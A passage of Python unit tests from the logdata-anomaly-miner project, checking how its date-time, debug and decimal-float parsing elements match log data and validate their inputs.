max_time_jump_seconds=max_time_jump_seconds) data = b"05.03 06:29:07: it still works" date = b"05.03 06:29:07" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1583389747, None) self.assertEqual(date_time_model_element.start_year, start_year) self.assertIn("WARNING:DEBUG:DateTimeModelElement time inconsistencies parsing b'01.01 23:59:01', expecting value around " "1609459140. Check your settings!", log_stream.getvalue()) data = b"29.02 07:24:02: it still works" date = b"29.02 07:24:02" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1582961042, None) self.assertEqual(date_time_model_element.start_year, start_year) for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) initialize_loggers(self.aminer_config, getpwnam("aminer").pw_uid, getgrnam("aminer").gr_gid) def test15time_change_cest_cet(self): """Check if the time change from CET to CEST and vice versa work as expected.""" data = b"24.03.2018 11:40:00 CET: it still works" date = b"24.03.2018 11:40:00 CET" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S%z", timezone.utc) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1521888000, None) # make sure format changes with longer format specifiers also work data = b"25.03.2018 11:40:00 CEST: it still works" date = b"25.03.2018 11:40:00 CEST" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1521970800, None) data = b"27.10.2018 11:40:00 CEST: it still works" date = b"27.10.2018 11:40:00 CEST" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1540633200, None) data = b"28.10.2018 11:40:00 CET: it still works" date = b"28.10.2018 11:40:00 CET" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1540723200, None) data = b"27.10.2018 11:40:00 EST: it still works" date = b"27.10.2018 11:40:00 EST" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1540658400, None) data = b"27.10.2018 11:40:00 PDT: it still works" date = b"27.10.2018 11:40:00 PDT" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1540665600, None) data = b"27.10.2018 11:40:00 GMT: it still works" date = b"27.10.2018 11:40:00 GMT" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1540640400, None) def test16same_timestamp_multiple_times(self): """Test if the DateTimeModelElement can handle multiple same timestamps.""" data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) def test17date_before_unix_timestamps(self): """Check if timestamps before the unix timestamp are processed properly.""" data = b"01.01.1900 11:40:00: it still works" date = b"01.01.1900 11:40:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, -2208946800, None) def test18element_id_input_validation(self): """Check if element_id is validated.""" date_format = b"%d.%m.%Y %H:%M:%S" self.assertRaises(ValueError, DateTimeModelElement, "", date_format) # empty element_id self.assertRaises(TypeError, DateTimeModelElement, None, date_format) # None element_id self.assertRaises(TypeError, DateTimeModelElement, b"path", date_format) # bytes element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, True, date_format) # boolean element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, 123, date_format) # integer element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, 123.22, date_format) # float element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, {"id": "path"}, date_format) # dict element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, ["path"], date_format) # list element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, [], date_format) # empty list element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, (), date_format) # empty tuple element_id is not allowed self.assertRaises(TypeError, DateTimeModelElement, set(), date_format) # empty set element_id is not allowed def test19date_format_input_validation(self): """Check if date_format is validated and only valid values can be entered.""" allowed_format_specifiers = b"bdfHMmSsYz%" # check if allowed values do not raise any exception. format_specifiers = b"" for c in allowed_format_specifiers: format_specifiers += b"%" + str(chr(c)).encode() DateTimeModelElement(self.id_, b"%" + str(chr(c)).encode()) # check if all allowed values can not be used together. An exception should be raised, because of multiple month representations # and %s with non-second formats. self.assertRaises(ValueError, DateTimeModelElement, self.id_, format_specifiers) DateTimeModelElement(self.id_, format_specifiers.replace(b"%m", b"").replace(b"%s", b"")) DateTimeModelElement(self.id_, format_specifiers.replace(b"%b", b"").replace(b"%s", b"")) DateTimeModelElement(self.id_, b"%s%z%f") for c in allowed_format_specifiers.replace(b"s", b"").replace(b"z", b"").replace(b"f", b"").replace(b"%", b""): self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%s%" + str(chr(c)).encode()) # test non-existent specifiers for c in b"aceghijklnopqrtuvwxyABCDEFGIJKLNOPQRTUVWXZ": self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%" + str(chr(c)).encode()) # test multiple specifiers. % and z specifiers are allowed multiple times. DateTimeModelElement(self.id_, b"%%%z%z") for c in allowed_format_specifiers.replace(b"%", b"").replace(b"z", b""): self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%" + str(chr(c)).encode() + b"%" + str(chr(c)).encode()) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"") # empty date_format self.assertRaises(TypeError, DateTimeModelElement, self.id_, None) # None date_format self.assertRaises(TypeError, DateTimeModelElement, self.id_, "") # string date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, 123) # integer date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, 123.22) # float date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, True) # boolean date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, {"id": "path"}) # dict date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, ["path"]) # list date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, []) # empty list date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, ()) # empty tuple date_format is not allowed self.assertRaises(TypeError, DateTimeModelElement, self.id_, set()) # empty set date_format is not allowed def test20time_zone_input_validation(self): """Check if time_zone is validated and only valid values can be entered.""" dtme = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S") self.assertEqual(dtme.time_zone, timezone.utc) DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) for tz in pytz.all_timezones: DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", pytz.timezone(tz)) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", b"UTC") self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", "UTC") self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", 1) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", 1.25) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", True) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", {"time_zone": timezone.utc}) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", [timezone.utc]) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", []) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", set()) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", ()) def test21text_locale_input_validation(self): """ Check if text_locale is validated and only valid values can be entered. An exception has to be raised if the locale is not installed on the system. """ DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, "en_US.UTF-8") DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, ("en_US", "UTF-8")) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, 1) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, 1.2) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, True) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, ["en_US", "UTF-8"]) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, {"en_US": "UTF-8"}) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, tuple("en_US.UTF-8")) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, set()) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, ()) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, ("en_US", "UTF-8", "de_AT", "UTF-8")) def test22start_year_input_validation(self): """Check if start_year is validated.""" dtme = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, None, None) self.assertEqual(dtme.start_year, datetime.now().year) DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, 2020) DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, -630) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, "2020") self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, True) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, 1.25) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, [2020]) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, []) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, {"key": 2020}) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, set()) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, ()) def test23max_time_jump_seconds_input_validation(self): """Check if max_time_jump_seconds is validated.""" dtme = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, None, None) self.assertEqual(dtme.max_time_jump_seconds, 86400) DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, 100000) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, -1) self.assertRaises(ValueError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, 0) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, "100000") self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, True) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, 1.25) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, [2020]) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, []) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, {"key": 2020}) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, ()) self.assertRaises(TypeError, DateTimeModelElement, self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc, None, None, set()) def test24get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S") data = b"07.02.2019 11:40:00: it still works" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test25performance(self): # skipcq: PYL-R0201 """Test the performance of the implementation.""" run_test = False import_setup = """ import copy from unit.TestBase import DummyMatchContext from aminer.parsing.DateTimeModelElement import DateTimeModelElement times = 100000 """ string_no_z_setup = """ date = b"[18/Oct/2021:16:12:55" dtme = DateTimeModelElement("s0", b"[%d/%b/%Y:%H:%M:%S") """ string_z1_setup = """ date = b"[18/Oct/2021:16:12:55 UTC+0100" dtme = DateTimeModelElement("s0", b"[%d/%b/%Y:%H:%M:%S%z") """ string_z2_setup = """ date = b"[18/Oct/2021:16:12:55 +0000]" dtme = DateTimeModelElement("s0", b"[%d/%b/%Y:%H:%M:%S%z") """ end_setup = """ dummy_match_context = DummyMatchContext(date) dummy_match_context_list = [copy.deepcopy(dummy_match_context) for _ in range(times)] def run(): match_context = dummy_match_context_list.pop(0) dtme.get_match_element("match", match_context) """ no_z_setup = import_setup + string_no_z_setup + end_setup z1_setup = import_setup + string_z1_setup + end_setup z2_setup = import_setup + string_z2_setup + end_setup if run_test: import timeit times = 100000 print() print("Every date is run %d times." % times) t = timeit.timeit(setup=no_z_setup, stmt="run()", number=times) print("No %z parameter ([18/Oct/2021:16:12:55): ", t) t = timeit.timeit(setup=z1_setup, stmt="run()", number=times) print("Date with %z parameter (18/Oct/2021:16:12:55 UTC+0100): ", t) t = timeit.timeit(setup=z2_setup, stmt="run()", number=times) print("Date with %z parameter (18/Oct/2021:16:12:55 +0000): ", t) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/DebugModelElementTest.py000066400000000000000000000110471437606560100301650ustar00rootroot00000000000000import unittest import sys from _io import StringIO from aminer.parsing.DebugModelElement import DebugModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class DebugModelElementTest(TestBase): """Unittests for the DebugModelElement.""" id_ = "debug" path = "path" def test1get_match_element_valid_match(self): """Parse data and check if the MatchContext was not changed.""" old_stderr = sys.stderr output = StringIO() sys.stderr = output debug_model_element = DebugModelElement(self.id_) self.assertEqual(output.getvalue(), "DebugModelElement %s added\n" % self.id_) output.seek(0) output.truncate(0) data = b"some data" match_context = DummyMatchContext(data) match_element = debug_model_element.get_match_element(self.path, match_context) self.assertEqual( output.getvalue(), 'DebugModelElement path = "%s", unmatched = "%s"\n' % (match_element.get_path(), repr( match_context.match_data))) self.compare_match_results(data, match_element, match_context, self.id_, self.path, b"", b"", None) output.seek(0) output.truncate(0) data = b"123 0x2a. [\"abc\"]:" match_context = DummyMatchContext(data) match_element = debug_model_element.get_match_element(self.path, match_context) self.assertEqual( output.getvalue(), 'DebugModelElement path = "%s", unmatched = "%s"\n' % (match_element.get_path(), repr( match_context.match_data))) self.compare_match_results(data, match_element, match_context, self.id_, self.path, b"", b"", None) sys.stderr = old_stderr def test2element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, DebugModelElement, "") # empty element_id self.assertRaises(TypeError, DebugModelElement, None) # None element_id self.assertRaises(TypeError, DebugModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, DebugModelElement, True) # bool element_id is not allowed self.assertRaises(TypeError, DebugModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, DebugModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, DebugModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, DebugModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, DebugModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, DebugModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, DebugModelElement, set()) # empty set element_id is not allowed def test3get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = DebugModelElement(self.id_) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/DecimalFloatValueModelElementTest.py000066400000000000000000000655201437606560100324650ustar00rootroot00000000000000import unittest from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class DecimalFloatValueModelElementTest(TestBase): """Unittests for the DecimalFloatValueModelElement.""" id_ = "float" path = "path" def test1get_match_element_default_values(self): """Test valid float values with default values of value_sign_type, value_pad_type and exponent_type.""" decimal_float_value_me = DecimalFloatValueModelElement( self.id_, DecimalFloatValueModelElement.SIGN_TYPE_NONE, DecimalFloatValueModelElement.PAD_TYPE_NONE, DecimalFloatValueModelElement.EXP_TYPE_NONE) data = b"22.25 some string." value = b"22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.25, None) data = b"0.25 some string." value = b"0.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.25, None) data = b"22 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22.12.2021 some string." value = b"22.12" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.12, None) data = b"22. some string" value = b"22." match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.0, None) data = b"0 some string" value = b"0" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) def test2get_match_element_default_values_no_match(self): """Test not matching values with default values of value_sign_type, value_pad_type and exponent_type.""" decimal_float_value_me = DecimalFloatValueModelElement( self.id_, DecimalFloatValueModelElement.SIGN_TYPE_NONE, DecimalFloatValueModelElement.PAD_TYPE_NONE, DecimalFloatValueModelElement.EXP_TYPE_NONE) data = b"+22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"-22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"22,25" value = b"22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b".25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"0025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"1e-5" value = b"1" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"e+10" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"1e+0" value = b"1" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"00" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_optional_zero_values(self): """Test valid float values with "optional" or "zero" values of value_sign_type, value_pad_type and exponent_type.""" decimal_float_value_me = DecimalFloatValueModelElement( self.id_, DecimalFloatValueModelElement.SIGN_TYPE_OPTIONAL, DecimalFloatValueModelElement.PAD_TYPE_ZERO, DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL) data = b"22.25 some string." value = b"22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.25, None) data = b"-22.25 some string." value = b"-22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -22.25, None) data = b"0.25 some string." value = b"0.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.25, None) data = b"22 some string." value = b"22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22.12.2021 some string." value = b"22.12" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.12, None) data = b"22. some string" value = b"22." match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.0, None) data = b"025 some string" value = b"025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25, None) data = b"0025 some string" value = b"0025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25, None) data = b"0025.22 some string" value = b"0025.22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25.22, None) data = b"1e-5 some string" value = b"1e-5" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1e-5, None) data = b"1e+0 some string" value = b"1e+0" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"0 some string" value = b"0" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) data = b"00 some string" value = b"00" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) def test4get_match_element_optional_zero_values_no_match(self): """Test not matching values with default values of value_sign_type, value_pad_type and exponent_type.""" decimal_float_value_me = DecimalFloatValueModelElement( self.id_, DecimalFloatValueModelElement.SIGN_TYPE_OPTIONAL, DecimalFloatValueModelElement.PAD_TYPE_ZERO, DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL) data = b"+22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"22,25" value = b"22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b".25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" 25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"e+10" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test5get_match_element_mandatory_blank_values(self): """Test valid float values with "mandatory" or "blank" values of value_sign_type, value_pad_type and exponent_type.""" decimal_float_value_me = DecimalFloatValueModelElement( self.id_, DecimalFloatValueModelElement.SIGN_TYPE_MANDATORY, DecimalFloatValueModelElement.PAD_TYPE_BLANK, DecimalFloatValueModelElement.EXP_TYPE_MANDATORY) data = b"+22.25e-5 some string." value = b"+22.25e-5" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.0002225, None) data = b"-22.25e+5 some string." value = b"-22.25e+5" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -2225000, None) data = b"+0.25e+1 some string." value = b"+0.25e+1" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 2.5, None) data = b"+22e-3 some string." value = b"+22e-3" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.022, None) data = b"+22e-5. some string" value = b"+22e-5" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.000220, None) data = b"+ 25e+1 some string" value = b"+ 25e+1" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 250, None) data = b"- 25e-17 some string" value = b"- 25e-17" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -25e-17, None) data = b"+22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"+1e-5 some string" value = b"+1e-5" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1e-5, None) data = b"+1e+0 some string" value = b"+1e+0" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"+ 1e+0 some string" value = b"+ 1e+0" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None) data = b"+0e-3 some string" value = b"+0e-3" match_context = DummyMatchContext(data) match_element = 